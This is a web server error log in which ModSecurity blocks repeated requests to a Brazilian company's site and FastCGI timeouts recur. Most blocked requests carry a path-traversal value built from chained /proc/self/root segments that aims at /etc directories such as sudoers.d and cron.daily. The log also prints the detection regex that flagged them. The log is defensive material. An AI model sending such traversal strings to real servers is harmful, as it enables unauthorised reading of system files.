https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:29.123386 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:23:31.083757 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:39694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIUxkFeYa1D6dYQnCnlAAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:23:32.275120 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.228.61:35968] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuIVBkFeYa1D6dYQnCnlQAAAdY"]
[Thu Mar 19 02:23:36.641787 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:35740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIWOyqAr6etmhZHNoflQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:44.722015 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:32914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuIYP-YZRR_7pZ7nDJJNgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:23:54.097848 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47450] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:24:18.129803 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:24:43.046344 2026] [proxy_fcgi:error] [pid 19093:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:25:07.129865 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:25:30.133841 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:25:54.137806 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:26:17.061805 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:26:31.740482 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:50810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJB8df6f5d65gmYZQuRQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:26:39.129938 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:26:50.411260 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:48672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJGhkFeYa1D6dYQnCoCAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:26:56.859399 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:41964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJIMdf6f5d65gmYZQuYQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:01.157821 2026] [proxy_fcgi:error] [pid 19093:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51902] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:27:02.003029 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:42112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJJuoXxyEfFpUF8f_NtwAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:08.907775 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:42122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJLAbLMZ6AikZjR9UYwgAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:11.723534 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:54814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJL8df6f5d65gmYZQudQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:23.069910 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52386] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:27:26.252643 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:51782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJPvu8EFLIOrSqIptXhQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:27:32.355399 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:54822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJQwbLMZ6AikZjR9UY2QAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:37.291148 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:43864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJSQkwaGbbGflqUZBtlwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:39.915243 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:49832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJS-oXxyEfFpUF8f_N4AAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:27:51.087860 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:28:14.125871 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:28:37.125826 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:28:59.037946 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:29:18.141936 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:49836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJrhkFeYa1D6dYQnCoVgAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:29:23.089927 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:29:24.427400 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:38348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJtAkwaGbbGflqUZBt0wAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:29:43.487660 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:59182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJxwkwaGbbGflqUZBt5AAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:29:49.149988 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:29:54.319107 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:50400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJ0uoXxyEfFpUF8f_OMwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:30:13.097979 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56198] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:30:13.240002 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:42266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuJ5fu8EFLIOrSqIptX3wAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
